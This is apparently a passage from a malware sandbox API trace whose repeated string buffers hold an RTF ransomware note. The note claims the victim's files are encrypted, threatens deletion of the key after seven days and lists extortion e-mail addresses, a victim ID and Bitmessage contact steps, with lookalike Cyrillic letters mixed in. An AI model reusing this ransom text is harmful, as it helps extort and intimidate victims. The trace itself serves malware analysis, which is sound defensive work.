fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.041] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.041] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b 